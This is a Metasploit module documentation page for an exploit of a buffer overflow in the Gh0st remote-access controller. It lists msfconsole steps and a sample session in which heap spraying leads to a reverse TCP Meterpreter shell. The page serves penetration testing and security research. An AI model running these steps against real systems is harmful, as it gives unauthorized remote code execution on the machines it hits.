ContextQMD
Back to Metasploit Framework

Gh0st

documentation/modules/exploit/windows/misc/gh0st.md

6.4.1311.2 KB
Original Source

Vulnerable Application

This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim. This vulnerability can allow remote code execution in the context of the user who ran it.

A vulnerable version of the software is available here: gh0st 3.6

Verification Steps

  1. Run the application
  2. Start msfconsole
  3. Do: use exploit/windows/misc/gh0st
  4. Do: set rhost [ip]
  5. Do: exploit
  6. Get a shell

Options

MAGIC

This is the 5 character magic used by the server. The default is Gh0st

Scenarios

Windows XP SP3 with gh0st 3.6

msf > use exploit/windows/misc/gh0st 
msf exploit(gh0st) > set rhost 192.168.2.108
rhost => 192.168.2.108
msf exploit(gh0st) > exploit

[*] Started reverse TCP handler on 1.2.3.4:4444 
[*] 1.2.3.1:80 - Trying target Gh0st Beta 3.6
[*] 1.2.3.1.108:80 - Spraying heap...
[*] 1.2.3.1:80 - Trying command 103...
[*] Sending stage (956991 bytes) to 1.2.3.1
[*] Meterpreter session 1 opened (1.2.3.4:4444 -> 1.2.3.1:1303) at 2017-08-26 16:53:58 -0400
[*] 1.2.3.1:80 - Server closed connection

meterpreter >